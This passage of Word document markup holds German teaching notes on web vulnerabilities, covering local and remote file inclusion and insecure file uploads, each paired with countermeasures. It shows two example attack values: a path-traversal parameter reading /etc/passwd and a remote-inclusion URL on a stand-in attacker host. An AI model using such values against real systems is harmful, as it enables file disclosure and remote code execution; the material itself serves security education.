        <w:t>: Durch die Überprüfung des Referer-Headers in HTTP-Anfragen kann der Server feststellen, ob die Anfrage von einer erlaubten Quelle stammt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A9960" w14:textId="6DBA23A2" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BD55B3" w14:textId="35FA52F5" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D33DC" w14:textId="559BDEC0" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>File Inclusion bezieht sich auf eine Sicherheitsanfälligkeit in Webanwendungen, die es einem Angreifer ermöglicht, externe Skripte oder Dateien in eine Webanwendung einzubinden und auszuführen. Diese Schwachstelle kann sowohl in PHP-basierten Anwendungen als auch in anderen Webanwendungsframeworks auftreten. Es gibt zwei Haupttypen von File Inclusion-Angriffen: Local File Inclusion (LFI) und Remote File Inclusion (RFI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139B62A8" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B247184" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023AE6B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Bei einem LFI-Angriff nutzt der Angreifer die Schwachstelle aus, um Dateien, die auf demselben Server wie die Webanwendung gespeichert sind, einzubinden und auszuführen. Dies kann das Lesen sensibler Dateien, wie Konfigurationsdateien, Quellcode, oder sogar Passwortdateien, umfassen. Der Angriff erfolgt durch Manipulation von Eingabeparametern, die in Datei-Einbindungsfunktionen verwendet werden, um auf Dateien innerhalb des Servers zuzugreifen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E71412" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F997CE" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C41AC8D" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Bei einem RFI-Angriff kann der Angreifer externe Dateien oder Skripte über das Internet in eine Webanwendung einbinden und ausführen. Dies ermöglicht es dem Angreifer, beliebigen Code auf dem Server der Webanwendung auszuführen. RFI wird oft durch die Ausnutzung derselben Schwachstellen wie LFI ermöglicht, allerdings mit dem Unterschied, dass der Angreifer auf externe Ressourcen verweist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E857A96" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BC8C68" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Wie File Inclusion funktioniert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963494D" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Webanwendungen beinhalten oft Dateien, um modularen Code zu unterstützen oder externe Bibliotheken und Skripte einzubinden. Entwickler verwenden Funktionen wie include(), require(), oder file_get_contents() in PHP, um diese Dateien einzubinden. Wenn diese Funktionen mit unsicheren Benutzereingaben verknüpft werden, ohne diese Eingaben angemessen zu validieren oder zu säubern, kann ein Angreifer manipulierte Pfade oder URLs übermitteln, die auf schädliche Dateien verweisen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FFC871" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB97D1A" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Beispiele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01376C" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ein Angreifer manipuliert einen URL-Parameter, der in einer include()-Anweisung verwendet wird, wie page=../../etc/passwd, um auf die Passwortdatei des Systems zuzugreifen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7F011" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ein Angreifer ersetzt einen Dateipfad durch eine URL, die auf ein externes Skript verweist, das er kontrolliert, wie page=http://angreifer.com/schadcode.php, wodurch dieses Skript auf dem Zielserver ausgeführt wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81A11B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E55FB" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eingabevalidierung:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Strenge Validierung aller Benutzereingaben, die in Datei-Einbindungsfunktionen verwendet werden, um sicherzustellen, dass nur erwartete und sichere Werte akzeptiert werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130581D6" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verwendung von Whitelists</w:t>
      </w:r>
      <w:r>
        <w:t>: Definieren von Whitelists für gültige Dateien, die einbezogen werden können, um nur bekannte, sichere Dateipfade zuzulassen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5552A7C3" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deaktivierung von allow_url_include in PHP</w:t>
      </w:r>
      <w:r>
        <w:t>: Durch Deaktivieren dieser Einstellung in der php.ini-Konfigurationsdatei kann verhindert werden, dass externe Dateien über URL-Pfade eingebunden werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE34D7" w14:textId="5EFAC672" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trennung von Benutzereingaben und Systempfaden</w:t>
      </w:r>
      <w:r>
        <w:t>: Vermeidung der direkten Verwendung von Benutzereingaben zur Konstruktion von Dateipfaden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CC721" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726F27D3" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B40EFCF" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21148303" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2E578C" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2375E3FD" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0F7ED5" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD1DD7A" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E1B89A" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4A88D2" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EABD101" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB3ED8B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584AEA30" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223EF259" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C438FE8" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE98C8A" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F46E99D" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B464BD9" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FBB3AA" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2ACE99" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBD7EEF" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4C3B93" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451DDA59" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0A78CB" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB5D77E" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7B1BE2" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCE8C8E" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B17C18" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1246F61B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346C04BA" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65ED802A" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BBBEE9" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2017E18D" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324CE918" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2B4BC3" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141E5C6B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16644947" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789CA066" w14:textId="23FA97BD" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09496D96" w14:textId="4364CD96" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:t>Die Möglichkeit zum Hochladen von Dateien ist eine gängige Funktion in vielen Webanwendungen, die es Benutzern erlaubt, Inhalte wie Bilder, Dokumente oder Videos zu teilen. Während diese Funktionalität aus Benutzersicht sehr nützlich ist, kann sie aus Sicherheitssicht erhebliche Risiken bergen, wenn sie nicht ordnungsgemäß implementiert wird. Unsichere Datei-Upload-Mechanismen können Angreifern Tür und Tor öffnen, um schädliche Dateien auf einen Server hochzuladen, was zu einer Vielzahl von Angriffen führen kann</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDDA39" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A9A888" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Arten von Angriffen durch unsichere Datei-Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B32B7E" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ausführen von schädlichem Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Wenn ein Angreifer in der Lage ist, eine Datei mit ausführbarem Code (z.B. PHP, JavaScript, Python-Skripte) auf den Server hochzuladen und der Server diese Datei ausführt, kann der Angreifer potenziell die Kontrolle über den Server erlangen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C98628D" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS):</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Durch das Hochladen von Dateien, die schädlichen JavaScript-Code enthalten, können Angreifer XSS-Angriffe durchführen, wenn andere Benutzer diese Dateien über die Webanwendung aufrufen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09BD00" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Denial-of-Service (DoS):</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Durch das Hochladen von sehr großen Dateien oder Dateien, die Ressourcen intensiv verarbeiten, können Angreifer einen DoS-Angriff starten, der die Verfügbarkeit der Anwendung beeinträchtigt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1DE28" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen und Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4A0FD" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Einschränkung des Dateityps:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Akzeptieren Sie nur bestimmte Dateitypen für den Upload. Dies kann durch Überprüfung der Dateiendung, des MIME-Typs oder, noch sicherer, durch Inspektion des Dateiinhalts geschehen, um sicherzustellen, dass er dem erwarteten Format entspricht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700D870" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Einstellen von Größenbeschränkungen:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Legen Sie eine maximale Dateigröße fest, um zu verhindern, dass Angreifer den Server durch das Hochladen sehr großer Dateien überlasten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C01F3" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von Anti-Virus/ Anti-Malware-Scannern</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t>: Scannen Sie hochgeladene Dateien automatisch auf Schadsoftware, bevor sie gespeichert oder für andere zugänglich gemacht werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63A922" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Speichern von Dateien in einem sicheren Bereich:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Speichern Sie hochgeladene Dateien außerhalb des Webroot-Verzeichnisses, um direkten Zugriff über einen URL-Pfad zu verhindern. Verwenden Sie stattdessen ein Skript zur sicheren Auslieferung von Dateien an Benutzer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C5FBB" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Namen und Zugriffsrechte ändern:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Ändern Sie den Namen hochgeladener Dateien, um direkte Referenzen zu vermeiden, und setzen Sie strenge Zugriffsrechte, um die Ausführung von Dateien zu verhindern, falls dies nicht benötigt wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D175BB" w14:textId="77777777" w:rsidR="009804F2" w:rsidRPr="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementierung von Authentifizierungs- und Autorisierungsprüfungen:</w:t>
      </w:r>
      <w:r w:rsidRPr="009804F2">
        <w:t xml:space="preserve"> Stellen Sie sicher, dass nur authentifizierte und autorisierte Benutzer Dateien hochladen können, und beschränken Sie die Aktionen, die sie mit hochgeladenen Dateien durchführen können.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2C106" w14:textId="489E56E2" w:rsidR="009804F2" w:rsidRDefault="009804F2" w:rsidP="009804F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009804F2">
        <w:rPr>
          <w:b/>
